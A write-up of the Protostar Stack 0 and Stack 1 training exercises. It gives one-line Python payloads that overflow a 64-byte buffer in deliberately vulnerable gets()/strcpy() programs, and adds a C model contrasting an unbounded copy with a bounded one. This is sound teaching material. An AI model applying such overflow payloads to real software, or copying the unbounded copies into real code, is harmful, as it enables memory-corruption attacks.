---
title: "Protostar Exploit Exercises Solutions 0-1"
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
---

# Stack 0

Here's what we're given:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
    printf("you have changed the 'modified' variable\n");
  } else {
    printf("Try again?\n");
  }
}
```

The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program reads input into `buffer` and then checks whether the `modified` variable has changed. I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:

```
$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
```

That works as expected. Now with 65 bytes:

```
$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
```

Solved!

# Stack 1

Here's the code we're given:

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
    errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
    printf("you have correctly got the variable to the right value\n");
  } else {
    printf("Try again, you got 0x%08x\n", modified);
  }
}
```

Just like Stack 0, we're given a `buffer` array of size 64 bytes and we're also asked to input its contents. Except this time it looks like `modified` has to equal `0x61626364` instead of just being changed like before. Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order:

```
$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
```

That works as expected. Now with the additional bytes:

```
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
```

Woo!
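
Why 64 bytes leaves `modified` at zero, why 65 changes it, and why `dcba` reads back as `0x61626364`, shown next to a bounded copy that leaves `modified` alone. This is an added example, not code from the original post or from Protostar. The `struct frame` layout and the names `le32`, `unbounded_copy` and `bounded_copy` are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define A16 "AAAAAAAAAAAAAAAA"
#define A64 A16 A16 A16 A16        /* constructed 64-byte filler */

/* Assumed frame layout (compiler-dependent): `modified` sits directly
 * above `buffer`, as the walkthrough's results imply. */
struct frame {
    char buffer[64];
    unsigned char modified[4];     /* raw bytes of the int */
};

/* Decode 4 bytes the way a little-endian CPU (x86) loads an int. */
static uint32_t le32(const unsigned char *p)
{
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}

/* gets()/strcpy() behaviour: copy through the NUL, ignoring sizeof(buffer).
 * Capped at sizeof(struct frame) so the model never leaves its own object. */
uint32_t unbounded_copy(const char *in)
{
    struct frame f;
    size_t n = strlen(in) + 1;
    memset(&f, 0, sizeof f);
    memcpy(&f, in, n < sizeof f ? n : sizeof f);
    return le32(f.modified);
}

/* Hardened copy: truncate to the destination, keep the terminator. */
uint32_t bounded_copy(const char *in)
{
    struct frame f;
    size_t n = strlen(in), max = sizeof f.buffer - 1;
    memset(&f, 0, sizeof f);
    memcpy(f.buffer, in, n < max ? n : max);  /* NUL left by memset */
    return le32(f.modified);
}

int main(void)
{
    printf("64 bytes: 0x%08x\n", (unsigned)unbounded_copy(A64));
    printf("65 bytes: 0x%08x\n", (unsigned)unbounded_copy(A64 "A"));
    printf("64+dcba : 0x%08x\n", (unsigned)unbounded_copy(A64 "dcba"));
    printf("bounded : 0x%08x\n", (unsigned)bounded_copy(A64 "dcba"));
    return 0;
}
```

With exactly 64 bytes the only byte that lands in `modified` is the string terminator, which is zero, so the check in Stack 0 still fails. The 65th byte is the first non-zero one to reach it.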